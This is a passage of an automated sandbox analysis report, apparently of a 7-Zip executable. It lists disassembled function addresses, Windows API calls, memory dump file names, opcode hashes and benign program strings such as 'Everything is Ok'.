                                                                                                                                                                                                                                                                            • Instruction ID: a7724cc6b9d601c8a5460d701dc9b5c41a6800074e9d99522c9146972b2e2b1e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3CF03A7020460192EF30AB90E4543E923A2FB86705F840124D14F416A0EF7DCA58CF16
                                                                                                                                                                                                                                                                            Function 0066ABB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58libraryloaderCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AddressDiskFreeHandleModuleProcSpace
                                                                                                                                                                                                                                                                            • String ID: GetDiskFreeSpaceExW$kernel32.dll
                                                                                                                                                                                                                                                                            • API String ID: 1197914913-1127948838
                                                                                                                                                                                                                                                                            • Opcode ID: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                                                                                            • Instruction ID: 4b77fc27dfc0cd0a30a99b8d58262bf69dd16727065b8359e5055551ccc7d49d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91232d8e4c27da98ed619dc657d8975082bad2379c6f63f0bea740be7d830b66
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6E116732316F4696DA51CF95F480B9AB365F795B80F445022EB8E03728EF38C559CB01
                                                                                                                                                                                                                                                                            Function 0066B114 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188timeCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32 ref: 0066B12A
                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32 ref: 0066B13E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$File$LocalSystem
                                                                                                                                                                                                                                                                            • String ID: gfff
                                                                                                                                                                                                                                                                            • API String ID: 1748579591-1553575800
                                                                                                                                                                                                                                                                            • Opcode ID: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                                                            • Instruction ID: d24740530775c28e0ac29af670c0e5cb17e3228b46db9a9d1f74a523d9b38789
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e09e1fa2f5dca829b3cb60a828e392fca3363189765d43a1e7a71e091b5d5d10
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 21518CA3B042C08BD7198B3DD846BCDBFC2D3A5758F48822ADB55C7785E26DC50AC721
                                                                                                                                                                                                                                                                            Function 0066B5E0 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 0066B5B8: GetCurrentProcess.KERNEL32 ref: 0066B5C2
                                                                                                                                                                                                                                                                            • GetSystemInfo.KERNEL32 ref: 0066B624
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CurrentInfoProcessSystem
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1098911721-0
                                                                                                                                                                                                                                                                            • Opcode ID: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                                                                                            • Instruction ID: c152522849c9960a756d02e83347fc6b6d15c4bb35b3cbb2463c18bfb1b38433
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fe78990de1b082a0b60084bcba32a5828cb8e3291c47789f548cb5e73abf302
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6CE09266624494C3CB70DB08D5426A9A362F3A4745FC46221E68AC2F04DF3DC694CF00
                                                                                                                                                                                                                                                                            Function 006AD670 Relevance: .0, Instructions: 11COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                            • Opcode ID: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                                                                                                                                                                                                                                                            • Instruction ID: 34afeae6880bda907862fecc5a575742f80bca13212b8b6d580c827bd778b7ad
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ee90a0e28cdf5ca319eb7aa323224805b652061d1b8a18153c9d68adb395663c
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 09C001FA2197408B874A8F2EA850818BBA0F788B907868029AA0CD3300E2358444CF24
                                                                                                                                                                                                                                                                            Function 00680C24 Relevance: 97.9, APIs: 78, Instructions: 364COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                                                                                            • Instruction ID: b1acff57324b152acbe65d01525c9a21106b451bfa18ef0ae4544b685367ee2d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9cbdc30e6d0b5ea00b42a6c34bff6f946b52da21b37e4cfe8bd3163259cd7e86
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFD1E27225D98181DB90FF21E47166FE726F7C3780F405156BB8EA7B69CE28C946CB08
                                                                                                                                                                                                                                                                            Function 00692A7D Relevance: 44.0, APIs: 35, Instructions: 257COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                                                                                            • Instruction ID: e027a3b4aeee5cb77e5b73c2f0744ffe1e4c724fb0222f9161fd9f050fd1c4ca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 28ab6cdc9f263cf9404c085a8059b8072311b560ecc5f73d0aa5210d99d2189d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4A915C7220AA8186CB64EF36D074A6EA766F7C7F85F012456DB4E63B51CE38C446C708
                                                                                                                                                                                                                                                                            Function 00681DB4 Relevance: 41.7, APIs: 33, Instructions: 418COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$ExceptionThrowmallocmemmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3352498445-0
                                                                                                                                                                                                                                                                            • Opcode ID: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
                                                                                                                                                                                                                                                                            • Instruction ID: 25412977b916f10e4b0d3a60bdd415c2a17be32c2691785ffacc12202d1a2b65
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 060a242fe419d18ace11e0b1f05433c8320572bf80c973ccad8851887f661016
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B7E1D573608AD286CB30FE15E4A11DDE766F386BD0F45022AEF9D6B755CE28C886C744
                                                                                                                                                                                                                                                                            Function 006705A0 Relevance: 40.7, APIs: 25, Strings: 2, Instructions: 209COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove$ExceptionThrow
                                                                                                                                                                                                                                                                            • String ID: incorrect update switch command$pqrxyzw
                                                                                                                                                                                                                                                                            • API String ID: 3957182552-3922825594
                                                                                                                                                                                                                                                                            • Opcode ID: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                                                                                            • Instruction ID: bbfb7981a87e8a8ef688d40d1463a9423d5748f1bcce8091aac742c4c6d8ab09
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c7c3e7fd9314440e1a1777af8ec9796aa83228940c07231adba96d4221eb7b0
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A881C372218985C2DB60EF25D8A07AEB322F7C5B84F408126EB9E47765CF38C946C754
                                                                                                                                                                                                                                                                            Function 00665D18 Relevance: 38.8, APIs: 21, Strings: 1, Instructions: 328COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove$wcscmp$ExceptionThrow
                                                                                                                                                                                                                                                                            • String ID: Empty file path
                                                                                                                                                                                                                                                                            • API String ID: 462375450-1562447899
                                                                                                                                                                                                                                                                            • Opcode ID: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                                                                                            • Instruction ID: 2d6e6e0ce1eef390853e2a5921ac7d4818f7ce72003095e114fcd4a1654b8e11
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0D1E433218AC086CB60EF25E49139EB762FB86B94F444129EF9E57B59DF39C945CB00
                                                                                                                                                                                                                                                                            Function 0066A224 Relevance: 37.8, APIs: 22, Strings: 3, Instructions: 317COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: \$\\?\$\\?\UNC\
                                                                                                                                                                                                                                                                            • API String ID: 0-1962706685
                                                                                                                                                                                                                                                                            • Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                                                                                            • Instruction ID: adccfd4fea442ad1fed56b8b1b420e10a68d2ef8f464823efa931904a060eebd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AFB1CE7220894090CF90FF61D4611AEA722EB927C4F442116EF4BA7779DF69CA46CB16
                                                                                                                                                                                                                                                                            Function 00661C58 Relevance: 31.5, APIs: 25, Instructions: 294COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00661C98
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00661CB9
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1452528299-0
                                                                                                                                                                                                                                                                            • Opcode ID: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                                                                                            • Instruction ID: fecc17da9c27a1340c8f8ca36bdf88a2748850bf3d265bb5c1d7df63aa6de4dd
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 33A1B072648A4181CB60EF15E4A05AEB723E7D37D0F841216FB8E57B68DF39C886CB04
                                                                                                                                                                                                                                                                            Function 006A7F50 Relevance: 30.2, APIs: 24, Instructions: 154COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1294909896-0
                                                                                                                                                                                                                                                                            • Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                                                                                            • Instruction ID: e39ba013a4f3e5d6e541e7adef5091c1413e0e56453ec1d193b196c9737711f1
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C5514F77614E8189C761FE31D8612A9A322FB97F98F590176EF2D2B799DE20CC028714
                                                                                                                                                                                                                                                                            Function 006A6C04 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 160COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: fputs$free$fputc
                                                                                                                                                                                                                                                                            • String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
                                                                                                                                                                                                                                                                            • API String ID: 2662072562-1527772849
                                                                                                                                                                                                                                                                            • Opcode ID: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                                                                                                                                                                                                                                                            • Instruction ID: 5f4cef13d730089afa8852d87f8f197aeb16925e2f6f0e74e7e92072286f721e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cf38ecbc90f80cce91f4804fd03da9a44f36afd14dcff60acdae5e80679d7744
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 60518C7630494182CF60FF21E6A03AE7323FB96BD4F484129FA5A43765CF28C955CB85
                                                                                                                                                                                                                                                                            Function 00681988 Relevance: 27.7, APIs: 22, Instructions: 211COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878978616.00000000006CF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_660000_7z.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: free$memmove
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1534225298-0
                                                                                                                                                                                                                                                                            • Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                                                                                            • Instruction ID: 7ecae756544332cfd17958c2e7fc1f4e77e73a63945ddc0686977d6a8c5db65c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 88718472219AC181CB60EB25E85139EA722F7C37D0F405216EF9E577A9DF28C847C704
                                                                                                                                                                                                                                                                            Function 0069187D Relevance: 25.2, APIs: 20, Instructions: 214COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • free.MSVCRT ref: 0069187D
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: malloc.MSVCRT ref: 00662134
                                                                                                                                                                                                                                                                              • Part of subcall function 00662130: _CxxThrowException.MSVCRT ref: 0066214F
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2878887421.0000000000661000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00660000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878861831.0000000000660000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878927956.00000000006AF000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2878956071.00000000006CC000.00000004.00000001.01000000.0000000A.sdmpDownload File
